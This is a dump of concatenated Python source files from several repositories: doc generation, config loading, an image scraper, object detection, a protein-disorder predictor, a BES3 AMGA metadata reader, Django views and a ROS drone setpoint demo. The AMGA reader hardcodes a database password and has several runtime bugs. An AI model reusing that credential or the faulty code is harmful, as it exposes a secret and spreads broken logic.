generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html'])
except Exception, e:
print 'Failed to build operator docs because: ', e
def generate_operators_page(raw_operators_api, destination_dir, lang_dirs):
operators_output = ''
try:
operators = clean_json_string(raw_operators_api)
# Go through all the operators and construct a new HTML object.
operator_template = Template(OPERATOR_TEMPLATE)
operators_output += OPERATORS_WRAPPER[0]
for operator in operators:
if 'comment' in operator:
formula_map = {}
comment = reserve_formulas(operator['comment'], formula_map,
only_reserve_double_dollar=True)
comment = markdown.markdown(comment,
extensions=MARKDOWN_EXTENSIONS)
#if len(operator_comment_line) > 0:
if 'markdown-equation' in comment:
soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml')
markdown_equation_placeholders = soup.select('.markdown-equation')
for equation in markdown_equation_placeholders:
equation.string = formula_map[equation.get('id')]
comment = unicode(
str(soup.select('body')[0])[6:-7], 'utf-8'
)
operator['comment'] = comment
operators_output += operator_template.render(Context(operator))
operators_output += OPERATORS_WRAPPER[1]
for lang in lang_dirs:
operators_output_path = '%s/%s/operators.html' % (destination_dir, lang)
print 'Saving operators.html to %s' % operators_output_path
if not os.path.exists(os.path.dirname(operators_output_path)):
os.makedirs(os.path.dirname(operators_output_path))
with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file:
operators_output_file.write(operators_output)
except Exception, e:
print 'Failed to build operator docs because: ', e
def clean_json_string(body):
"""
Takes in a string meant to be interpreted as a JSON object, and removes
faulty characters, recursively.
"""
try:
return json.loads(body)
except ValueError, e:
if str(e).startswith('Invalid control character'):
faulty_character_index = int(re.search(
'char (?P<column>\d+)', str(e)).group('column'))
return clean_json_string(
body[:faulty_character_index] + body[faulty_character_index+1:])
| 2.375 | 2 |
mysql2sqlite/config/__init__.py | MFrat/mysql2sqlite | 0 | 12796636 | import yaml
from pkg_resources import resource_stream
def load(filename):
with resource_stream(__name__, filename) as config_file:
return yaml.load(config_file)
def load_cluster_config(name):
return load('{0}.yml'.format(name))
_env = load('context.yml')
_configs = {}
def get_config(env):
if env not in _configs:
_configs[env] = load_cluster_config(get_cluster_name(env))
_configs[env].update(_env[env].get("override", {}))
return _configs[env]
def get_cluster_name(env):
return _env[env]["cluster"]
| 2.328125 | 2 |
crawl.py | doudounannan/python-crawl | 0 | 12796637 | import requests, urllib, urllib2, os
from bs4 import BeautifulSoup
import style
def getImg(url):
response = requests.get(url)
soup = BeautifulSoup(response.text, 'lxml')
imgs = soup.find_all('img')
for img in imgs:
print(img.get('src'))
def downloadImg(imgUrl, targetUrl):
arr = imgUrl.split('/')
fileName = arr[len(arr) - 1]
if not os.path.exists(targetUrl + fileName):
output = open(targetUrl + fileName, 'wb+')
imgData = urllib2.urlopen(imgUrl).read()
output.write(imgData)
output.close()
print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.'
else:
print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + ' is here!'
downloadImg('http://posters.imdb.cn/ren-pp/0000701/CjR3AsiaP_1190290948.jpg', '/Users/zhengmeiyu/Downloads/')
getImg('http://22mm.xiuna.com/mm/qingliang/')
| 3.21875 | 3 |
fsc/detect.py | wsx66848/tsd | 4 | 12796638 | <reponame>wsx66848/tsd
import sys
from myutils import my_config
from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result
import os.path as osp
from app import *
debug = False
# only for debug
def load_result():
lines = ""
with open("test_image/standard_result_6411.txt", "r") as f:
lines = f.read()
return lines
def main():
#detection debug
if debug is True:
print(load_result())
return
path = sys.path[0]
# config = path + '/../configs/faster_rcnn_r50_fpn_1x.py'
# checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth'
config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py'
checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth'
model = init_detector(config, checkpoint)
my_config.set('classes', model.CLASSES)
# print(model)
img = path + '/test.jpg'
if(len(sys.argv) > 1) :
img = sys.argv[1]
print(img)
result = inference_detector(model, img)
out_file = osp.splitext(img)[0] + "_result.png"
# show_result_pyplot(img, result, model.CLASSES, score_thr=0.05)
show_result(img, result, model.CLASSES, out_file=out_file)
print("out_file:%s" % out_file)
if __name__ == '__main__':
main()
| 1.765625 | 2 |
bin/iupred2a.py | tomasMasson/baculovirus_phylogenomics | 0 | 12796639 | <gh_stars>0
#!/usr/bin/env python3
import sys
import textwrap
import math
import os
from Bio import SeqIO
def avg(lst):
return sum(lst) / len(lst)
def aa_freq(_seq):
_freq = {}
for _aa in _seq:
if _aa in _freq:
_freq[_aa] += 1
else:
_freq[_aa] = 1
for _aa, _ins in _freq.items():
_freq[_aa] = _ins / len(_seq)
return _freq
def read_matrix(matrix_file):
_mtx = {}
with open(matrix_file, "r") as _fhm:
for _line in _fhm:
if _line.split()[0] in _mtx:
_mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])
else:
_mtx[_line.split()[0]] = {}
_mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])
return _mtx
def read_histo(histo_file):
hist = []
h_min = float("inf")
h_max = -float("inf")
with open(histo_file, "r") as fnh:
for _line in fnh:
if _line.startswith("#"):
continue
if float(_line.split()[1]) < h_min:
h_min = float(_line.split()[1])
if float(_line.split()[1]) > h_max:
h_max = float(_line.split()[1])
hist.append(float(_line.split()[-1]))
h_step = (h_max - h_min) / (len(hist))
return hist, h_min, h_max, h_step
def smooth(energy_list, window):
weighted_energy_score = [0] * len(energy_list)
for idx in range(len(energy_list)):
weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)])
return weighted_energy_score
def read_seq(fasta_file):
_seq = ""
with open(fasta_file) as file_handler:
for _line in file_handler:
if _line.startswith(">"):
continue
_seq += _line.strip()
return _seq
def iupred(seq, mode):
if mode == "short":
lc = 1
uc = 25
wc = 10
mtx = read_matrix("{}/data/iupred2_short_energy_matrix".format(PATH))
histo, histo_min, histo_max, histo_step = read_histo("{}/data/short_histogram".format(PATH))
elif mode == 'glob':
lc = 1
uc = 100
wc = 15
mtx = read_matrix("{}/data/iupred2_long_energy_matrix".format(PATH))
histo, histo_min, histo_max, histo_step = read_histo("{}/data/long_histogram".format(PATH))
else:
lc = 1
uc = 100
wc = 10
mtx = read_matrix("{}/data/iupred2_long_energy_matrix".format(PATH))
histo, histo_min, histo_max, histo_step = read_histo("{}/data/long_histogram".format(PATH))
unweighted_energy_score = [0] * len(seq)
weighted_energy_score = [0] * len(seq)
iupred_score = [0] * len(seq)
for idx in range(len(seq)):
freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc + 1:idx + uc + 1])
for aa, freq in freq_dct.items():
try:
unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq
except KeyError:
unweighted_energy_score[idx] += 0
if mode == 'short':
for idx in range(len(seq)):
for idx2 in range(idx - wc, idx + wc + 1):
if idx2 < 0 or idx2 >= len(seq):
weighted_energy_score[idx] += -1.26
else:
weighted_energy_score[idx] += unweighted_energy_score[idx2]
weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1))
else:
weighted_energy_score = smooth(unweighted_energy_score, wc)
glob_text = ""
if mode == 'glob':
gr = []
in_gr = False
beg, end = 0, 0
for idx, val in enumerate(weighted_energy_score):
if in_gr and val <= 0.3:
gr.append({0: beg, 1: end})
in_gr = False
elif in_gr:
end += 1
if val > 0.3 and not in_gr:
beg = idx
end = idx
in_gr = True
if in_gr:
gr.append({0: beg, 1: end})
mgr = []
k = 0
kk = k + 1
if gr:
beg = gr[0][0]
end = gr[0][1]
nr = len(gr)
while k < nr:
if kk < nr and gr[kk][0] - end < 45:
beg = gr[k][0]
end = gr[kk][1]
kk += 1
elif end - beg + 1 < 35:
k += 1
if k < nr:
beg = gr[k][0]
end = gr[k][1]
else:
mgr.append({0: beg, 1: end})
k = kk
kk += 1
if k < nr:
beg = gr[k][0]
end = gr[k][1]
seq = seq.lower()
nr = 0
res = ""
for i in mgr:
res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper()
nr = i[1] + 1
res += seq[nr:]
res = " ".join([res[i:i + 10] for i in range(0, len(res), 10)])
glob_text += "Number of globular domains: {}\n".format(len(mgr))
for n, i in enumerate(mgr):
glob_text += " globular domain {}.\t{}-{}\n".format(n + 1, i[0] + 1, i[1] + 1)
glob_text += "\n".join(textwrap.wrap(res, 70))
for idx, val in enumerate(weighted_energy_score):
if val <= histo_min + 2 * histo_step:
iupred_score[idx] = 1
elif val >= histo_max - 2 * histo_step:
iupred_score[idx] = 0
else:
iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))]
return iupred_score, glob_text
def anchor2(seq, iupred_scores):
local_window_size = 41
iupred_window_size = 30
local_smoothing_window = 5
par_a = 0.0013
par_b = 0.26
par_c = 0.43
iupred_limit = par_c - (par_a / par_b)
mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH))
interface_comp = {}
with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn:
for line in _fn:
interface_comp[line.split()[1]] = float(line.split()[2])
local_energy_score = [0] * len(seq)
interface_energy_score = [0] * len(seq)
energy_gain = [0] * len(seq)
for idx in range(len(seq)):
freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size + 1])
for aa, freq in freq_dct.items():
try:
local_energy_score[idx] += mtx[seq[idx]][aa] * freq
except KeyError:
local_energy_score[idx] += 0
for aa, freq in interface_comp.items():
try:
interface_energy_score[idx] += mtx[seq[idx]][aa] * freq
except KeyError:
interface_energy_score[idx] += 0
energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx]
iupred_scores = smooth(iupred_scores, iupred_window_size)
energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window)
anchor_score = [0] * len(seq)
for idx in range(len(seq)):
sign = 1
if energy_gain[idx] < par_b and iupred_scores[idx] < par_c:
sign = -1
corr = 0
if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0:
corr = (par_a / (iupred_scores[idx] - par_c)) + par_b
anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c)
anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116)))
return anchor_score
PATH = os.path.dirname(os.path.realpath(__file__))
help_msg = """Usage: {} (options) (seqfile) (iupred type)
\tAvailable types: \"long\", \"short\", \"glob\"
Options
\t-d str - Location of data directory (default='./')
\t-a - Enable ANCHOR2 predition\n""".format(sys.argv[0])
if len(sys.argv) < 2:
sys.exit(help_msg)
if not os.path.isfile(sys.argv[-2]):
sys.exit('Input sequence file not found at {}!\n{}'.format(sys.argv[-2], help_msg))
if not os.path.isdir(PATH):
sys.exit('Data directory not found at {}!\n{}'.format(PATH, help_msg))
if '-d' in sys.argv:
PATH = sys.argv[sys.argv.index('-d') + 1]
if not os.path.isdir(os.path.join(PATH, 'data')):
sys.exit('Data directory not found at {}!\n{}'.format(PATH, help_msg))
if sys.argv[-1] not in ['short', 'long', 'glob']:
sys.exit('Wrong iupred2 option {}!\n{}'.format(sys.argv[-1], help_msg))
# Print output message with run parameters
print("""# IUPred2A: context-dependent prediction of protein disorder as a function of redox state and protein binding
# <NAME>, <NAME>, <NAME>
# Nucleic Acids Research 2018;46(W1):W329-W337.
#
# Prediction type: {}
# Prediction output""".format(sys.argv[-1]))
# Add SeqIO parser to support multiple sequences analysis simultaneously
sequences = SeqIO.parse(sys.argv[-2], "fasta")
for sequence in sequences:
# Print individual sequence identifier for posterior parsing
print(f">{sequence.id}")
iupred2_result = iupred(sequence, sys.argv[-1])
if '-a' in sys.argv:
if sys.argv[-1] == 'long':
anchor2_res = anchor2(sequence, iupred2_result[0])
else:
anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0])
if sys.argv[-1] == 'glob':
print(iupred2_result[1])
if '-a' in sys.argv:
print("# POS\tRES\tIUPRED2\tANCHOR2")
else:
print("# POS\tRES\tIUPRED2")
for pos, residue in enumerate(sequence):
print('{}\t{}\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end="")
if '-a' in sys.argv:
print("\t{:.4f}".format(anchor2_res[pos]), end="")
print()
| 2.796875 | 3 |
Badger/DataLoader/AMGA/readAttributes.py | zhangxt-ihep/IHEPDIRAC | 0 | 12796640 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# author: linlei
#for data/all name of file like run_0023454_All_file014_SFO-2.dst
#for data/skim & mc, we use new file naming rule,
#file name like resonance_eventType_streamId_runL_runH_*.dst
import os
import os.path
import ROOT
from ROOT import gROOT
from amga import mdclient,mdinterface
import string
import re
import time
#get number behiend string "exp"
def getNum(expNum):
format = re.compile(r"\d+")
res = format.search(expNum)
if res is not None:
return res.group()
#Get expNum and resonance from ExpSearch according runids
def getExpRes(runids):
entries = []
expRes = {}
expNumList = []
resList = []
#print"runids",runids
client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r')
#client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root')
#get all entries under catalog "/BES3/ExpSearch"
client.listEntries('/BES3_test/ExpSearch')
entry = client.getEntry()[0]
while entry:
entries.append(entry)
entry = client.getEntry()[0]
if entries is None:
print "ExpSearch directory is empty, please run createBesDir first"
return Flase
for item in entries:
#for each entry,get its attributes in amga
client.getattr(item,['Id','runFrm','runTo','expNum','resonance'])
result = client.getEntry()[1]
# print item
# print result
runfrm = string.atoi(result[1])
runto = string.atoi(result[2])
for runid in runids:
#check all runid whether between runfrm and runto of each entry
#under catalog "/BES3/ExpSearch"
if runfrm<=runid<=runto:
#if this runid between runfrm and runto,and expNum isn't in expNumList
#add this expNum to expNumList
if result[3] not in expNumList:
expNumList.append(result[3])
#resonance of this id isn't in resonance List,add it to resList
if result[4] not in resList:
resList.append(result[4])
#only including one resonance
if len(resList) == 1:
expRes["resonance"] = resList[0]
else:
#has several resonances,may be has something wrong to this file
print "serveral resonance:",resList
return False
#only including one expNum
if len(expNumList) == 1:
expRes["expNum"] = expNumList[0]
else:
#if including several expNums,combine these expNum into mexpN1pN2p...
sorted(expNumList)
str = "m" + expNumList[0]
for expNum in expNumList[1:]:
str = str + "p+" + getNum(expNum)
expRes["expNum"] = str
return expRes
#check whether eventType is stored in eventTypeList in amga
def eventTypeCheck(eventType):
entries = []
client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r')
#client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root')
client.listEntries('/BES3_test/EventTypeList')
entry = client.getEntry()[0]
while entry:
entries.append(entry)
entry = client.getEntry()[0]
for entry in entries:
#get name of each entry
client.getattr(entry,['FILE'])
result = client.getEntry()[1]
#compare eventType with name of each entry
if eventType == result[0]:
return True
return False
#judge format of file
class JudgeFormat(Exception):
def __init__(self, format):
self.format = format
def __str__(self):
return repr("the File's format is not ",self.format)
#type of srcformat is list,it includes many formats
def checkFormat(srcformat,file):
flag = 0
#print "file",file
for format in srcformat:
#if format of file is in srcformat
if file.endswith(format):
flag = 1
return flag
#Before reading information from .root file,we need to use changeFormat
#function to create a .root link for .dst file
def changeFormat(dstfile,rootfile,srcformat=[".dst",".tag"],destformat=[".root"]):
flag = checkFormat(srcformat,dstfile)
if flag==0:
raise JudgeFormat(srcformat)
return
flag = checkFormat(destformat,rootfile)
if flag==0:
raise JudgeFormat(destformat)
return
#if this rootfile has exists,then delete it
if os.path.exists(rootfile):
os.unlink(rootfile)
#create a new rootfile for dstfile
os.symlink(dstfile,rootfile)
return rootfile
#dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst,
#return run_0023474_All_file007_SFO-2
def getLFN(dstfile,format=[".dst",".tag"]):
flag = checkFormat(format,dstfile)
if flag==0:
raise JudgeFormat(format)
return
#split dstfile by "/",then get "lfn.dst"
items=dstfile.split("/")
length=len(items)
filename=items[length-1]
#split "*.dst" by "."
#get lfn
lfn = filename.split('.')[0]
return lfn
#get size of dst file
def getFileSize(dstfile,format = [".dst",".tag"]):
flag = checkFormat(format,dstfile)
if flag==0:
raise JudgeFormat(format)
return
if os.path.exists(dstfile):
#get file's size
return os.path.getsize(dstfile)
#lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH
#lfn like run_0009947_All_file001_SFO-1,get attribute runId
def splitLFN(lfn,type):
result = {}
items = lfn.split("_")
if type == "all":
if items[2] == "All":
runId = string.atoi(items[1])
return runId
else:
result["resonance"] = items[0]
result["eventType"] = items[1]
result["streamId"] = items[2]
result["runL"] = string.atoi(items[3])
result["runH"] = string.atoi(items[4])
return result
#get runIdList from JobOptions
def getRunIdList(jobOptions):
result = {}
runIdList = []
str1=jobOptions[0]
pat = re.compile(r'RunIdList= {-\d+(,-?\d+)+}')
res1 = pat.search(str1)
if res1 is not None:
#get a string like:RunIdList={-10513,0,-10629}
str2 = res1.group()
result["description"] = str2
pat = re.compile(r'-\d+(,-?\d+)+')
list = pat.search(str2)
if list is not None:
#get a string like:-10513,0,-10629
runIds = list.group()
#split runIds according ','
items=runIds.split(',')
#members' style in items is string,we need to change their style to integer
for i in items:
if i!='0':
runid=abs(string.atoi(i))
runIdList.append(runid)
result["runIdList"] = runIdList
return result
#get Boss version, runid, Entry number, JobOptions from root file
def getCommonInfo(rootfile):
commoninfo = {}
gROOT.ProcessLine('gSystem->Load("libRootEventData.so");')
gROOT.ProcessLine('TFile file("%s");'%rootfile)
gROOT.ProcessLine('TTree* tree =(TTree*)file.Get("JobInfoTree");')
gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get("Event");')
gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch("JobInfo");')
gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch("TEvtHeader");')
gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();')
gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();')
gROOT.ProcessLine('branch->SetAddress(&jobInfo);')
gROOT.ProcessLine('branch1->SetAddress(&evtHeader);')
gROOT.ProcessLine('branch->GetEntry(0);')
gROOT.ProcessLine('branch1->GetEntry(0);')
gROOT.ProcessLine('Int_t num=tree1.GetEntries()')
#get Boss Version
commoninfo["bossVer"] = ROOT.jobInfo.getBossVer()
#get RunId
commoninfo["runId"] = abs(ROOT.evtHeader.getRunId())
#get all entries
commoninfo["eventNum"] = ROOT.num
#get TotEvtNo
#commoninfo["TotEvtNo"] = list(i for i in ROOT.jobInfo.getTotEvtNo())
#get JobOption
commoninfo["jobOptions"] = list(i for i in ROOT.jobInfo.getJobOptions())
#set DataType
commoninfo["dataType"]='dst'
return commoninfo
#get bossVer,eventNum,dataType,fileSize,name,eventType,expNum,
#resonance,runH,runL,status,streamId,description
class DataAll(object):
def __init__(self,dstfile,rootfile):
self.dstfile = dstfile
self.rootfile = rootfile
def getAttributes(self):
#store all attributes
attributes = {}
expRes = {}
runIds = []
#change the .dst file to .root file
rootfile = changeFormat(self.dstfile,self.rootfile)
if getFileSize(self.dstfile)<5000:
print "Content of this file is null:",self.dstfile
return "error"
else:
attributes = getCommonInfo(rootfile)
#get filesize by calling getFileSize function
#get name by calling getLFN function
attributes["fileSize"] = getFileSize(self.dstfile)
attributes["LFN"] = getLFN(self.dstfile)
#for .dst files of Data/All,their EventType are "all"
attributes["eventType"] = "all"
#get runId from filename
runId = splitLFN(attributes["LFN"],"all")
#compare runid of rootfile with runid in filename
if attributes["runId"] == runId:
runIds.append(attributes["runId"])
#get expNum and Resonance by calling getExpRes(runIds)
expRes = getExpRes(runIds)
if expRes == False:
print "Can't get expNum and resonance of this file"
return "error"
attributes["expNum"] = expRes["expNum"]
attributes["resonance"] = expRes["resonance"]
#set RunH=RunId and RunL=RunId
attributes["runH"] = attributes["runId"]
attributes["runL"] = attributes["runId"]
else:
print "runId of %s,in filename is %d,in rootfile is %d"%(self.dstfile,lfnInfo["runId"],attributes["runId"])
return "error"
#set values of attribute status,streamId,Description
#and these values are null
#-1 <=> value of status is null
#-1 <=> value of streamId is null
#null <=> value of Description is null
attributes["status"] = -1
attributes["streamId"] = 'stream0'
attributes["description"] = 'null'
del attributes["runId"]
del attributes["jobOptions"]
return attributes
#get resonance,runL,runH,eventType,streamId,LFN from file name
#file name like resonance_eventType_streamId_runL_runH_*.dst
#get bossVer,runL,runH,eventNum by reading information from rootfile
class Others(object):
def __init__(self,dstfile,rootfile):
self.dstfile = dstfile
self.rootfile = rootfile
def getAttributes(self):
#store all attributes
attributes = {}
expRes = {}
lfnInfo = {}
runIds = []
#change the .dst file to .root file
rootfile = changeFormat(self.dstfile,self.rootfile)
if getFileSize(self.dstfile)<5000:
print "Content of this file is null:",self.dstfile
return "error"
else:
attributes = getCommonInfo(rootfile)
#get filesize by calling getFileSize function
#get lfn by calling getLFN function
attributes["fileSize"] = getFileSize(self.dstfile)
attributes["LFN"] = getLFN(self.dstfile)
#get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function
lfnInfo = splitLFN(attributes["LFN"],"others")
#if runL is equal to runH,this file only has one runId
if lfnInfo["runL"] == lfnInfo["runH"]:
#if runId in filename also is equal to runId in rootfile
if attributes["runId"] == lfnInfo["runL"]:
runIds.append(attributes["runId"])
attributes["runL"] = attributes["runId"]
attributes["runH"] = attributes["runId"]
#get expNum and Resonance by calling getExpRes()
expRes = getExpRes(runIds)
if expRes == False:
print "Can't get expNum and resonance of this file"
return "error"
attributes["expNum"] = expRes["expNum"]
attributes["description"] = "null"
#if resonance in filename is same as resonance that get from ExpSearch
if expRes["resonance"] == lfnInfo["resonance"]:
attributes["resonance"] = expRes["resonance"]
else:
print "Error %s:resonance in filename is %s,in ExpSearch is %s"%(self.dstfile,lfnInfo["resonance"],expRes["resonance"])
return "error"
else:
print "Error %s:in the filename,runL = runH = %d,but runId in the root file is %d"%(self.dstfile,lfnInfo["runL"],attributes["runId"])
return "error"
else:
#this dst file has several runIds,get them from JobOptions by calling getRunIdList function
result = getRunIdList(attributes["jobOptions"])
if result is not None:
runH = max(result["runIdList"])
runL = min(result["runIdList"])
if runL == lfnInfo["runL"]:
if runH == lfnInfo["runH"]:
attributes["runL"] = lfnInfo["runL"]
attributes["runH"] = lfnInfo["runH"]
#get expNum and Resonance by calling getExpRes(runid)
expRes = getExpRes(result["runIdList"])
if expRes == False:
print "Error:",this.dstfile
return "error"
attributes["expNum"] = expRes["expNum"]
attributes["description"] = result["description"]
if expRes["resonance"] == lfnInfo["resonance"]:
attributes["resonance"] = lfnInfo["resonance"]
else:
print "Error %s:resonance in filename is %s,in ExpSearch is %s"%(self.dstfile,lfnInfo["resonance"],expRes["resonance"])
return "error"
else:
print "Error %s:runH in filename is %d,in jobOptions is %d"%(self.dstfile,lfnInfo["runH"],runH)
return "error"
else:
print "Error %s:runL in filename is %d,in jobOptions is %d"%(self.dstfile,lfnInfo["runL"],runL)
return "error"
#get streamId from filename
attributes["streamId"] = lfnInfo["streamId"]
#check eventType in filename
evtType_exists = eventTypeCheck(lfnInfo["eventType"])
if evtType_exists == True:
attributes["eventType"] = lfnInfo["eventType"]
else:
print "Error %s:eventType %s in filename is not stored in AMGA"%(self.dstfile,lfnInfo["eventType"])
return "error"
#set values of attribute status
#-1 <=> value of status is null
attributes["status"] = -1
del attributes["runId"]
del attributes["jobOptions"]
return attributes
if __name__=="__main__":
import time
start=time.time()
obj = DataAll("/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst","/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root")
end = time.time()
print "661:",str(start - end)
start = time.time()
obj = DataAll("/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst","/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root")
end = time.time()
print "655:",str(start - end)
| 2.125 | 2 |
rivet/views.py | DruidGreeneyes/rivet_site | 0 | 12796641 | <reponame>DruidGreeneyes/rivet_site<gh_stars>0
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from .models import Comparison
from pyrivet_core.sqlite3_lexicon import Lexicon
from pyrivet_core import rivet
# Create your views here.
def get_latest_comparisons(num=5):
return Comparison.objects.order_by('id')[:num]
def index(request):
latest_comparisons = get_latest_comparisons()
context = {
'latest_comparisons': latest_comparisons,
}
output = render(request, 'rivet/index.html', context)
return output
def submit(request):
try:
document_a, document_b = sorted((request.POST['doca'], request.POST['docb']))
do_deep = 'deep' in request.POST
except KeyError:
latest_comparisons = get_latest_comparisons()
return render(request, 'rivet/index.html', {
'latest_comparisons': latest_comparisons,
'error_message': "Bad Input!"
})
else:
try:
cmp = Comparison.objects.get(document_a=document_a, document_b=document_b)
except Comparison.DoesNotExist:
print("Comparing documents: ")
if do_deep:
with Lexicon.open(size=1000, nnz=8) as lex:
result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True)
else:
result = rivet.compare_documents(document_a, document_b)
result = result[0][1]
cmp = Comparison(document_a=document_a, document_b=document_b, result=result)
cmp.save()
return HttpResponseRedirect(reverse('comparison', args=(cmp.id,)))
def comparison(request, comparison_id):
c = get_object_or_404(Comparison, pk=comparison_id)
r = c.result
r -= 0.55
r *= 2.2
r = int(r * 100)
return render(request, 'rivet/comparison.html', {'comparison': c, 'result': r})
| 2.171875 | 2 |
openuav-app/dockerfiles/openuav_sample/ros-setups/intel-edison/setpoint_demo.py | harishanand95/openuav-playground | 23 | 12796642 | #!/usr/bin/env python
# vim:set ts=4 sw=4 et:
#
#
# ****************************************************************************
# *
# * Copyright (c) 2015 UAVenture AG. All rights reserved.
# * Author: <NAME> <<EMAIL>>
# *
# * Redistribution and use in source and binary forms, with or without
# * modification, are permitted provided that the following conditions
# * are met:
# *
# * 1. Redistributions of source code must retain the above copyright
# * notice, this list of conditions and the following disclaimer.
# * 2. Redistributions in binary form must reproduce the above copyright
# * notice, this list of conditions and the following disclaimer in
# * the documentation and/or other materials provided with the
# * distribution.
# * 3. Neither the name PX4 nor the names of its contributors may be
# * used to endorse or promote products derived from this software
# * without specific prior written permission.
# *
# * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
# * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# * POSSIBILITY OF SUCH DAMAGE.
# *
# ****************************************************************************
import rospy
import thread
import threading
import time
from geometry_msgs.msg import PoseStamped, Quaternion
from math import *
from mavros.srv import CommandBool
from mavros.utils import *
from std_msgs.msg import Header
from std_msgs.msg import String
from tf.transformations import quaternion_from_euler
class Setpoint:
def __init__(self, pub, rospy):
self.pub = pub
self.rospy = rospy
self.x = 0.0
self.y = 0.0
self.z = 0.0
try:
thread.start_new_thread( self.navigate, () )
except:
print "Error: Unable to start thread"
# TODO(simon): Clean this up.
self.done = False
self.done_evt = threading.Event()
sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached)
def navigate(self):
rate = self.rospy.Rate(10) # 10hz
msg = PoseStamped()
msg.header = Header()
msg.header.frame_id = "base_footprint"
msg.header.stamp = rospy.Time.now()
while 1:
msg.pose.position.x = self.x
msg.pose.position.y = self.y
msg.pose.position.z = self.z
# For demo purposes we will lock yaw/heading to north.
yaw_degrees = 0 # North
yaw = radians(yaw_degrees)
quaternion = quaternion_from_euler(0, 0, yaw)
msg.pose.orientation = Quaternion(*quaternion)
self.pub.publish(msg)
rate.sleep()
def set(self, x, y, z, delay=0, wait=True):
self.done = False
self.x = x
self.y = y
self.z = z
if wait:
rate = rospy.Rate(5)
while not self.done:
rate.sleep()
time.sleep(delay)
def reached(self, topic):
#print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z)
if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5:
self.done = True
self.done_evt.set()
def setpoint_demo():
pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10)
rospy.init_node('pose', anonymous=True)
rate = rospy.Rate(10)
setpoint = Setpoint(pub, rospy)
print "Climb"
setpoint.set(0.0, 0.0, 3.0, 0)
setpoint.set(0.0, 0.0, 10.0, 5)
print "Sink"
setpoint.set(0.0, 0.0, 8.0, 5)
print "Fly to the right"
setpoint.set(10.0, 4.0, 8.0, 5)
print "Fly to the left"
setpoint.set(0.0, 0.0, 8.0, 5)
offset_x = 0.0
offset_y = 0.0
offset_z = 10.0
sides = 360
radius = 20
print "Fly in a circle"
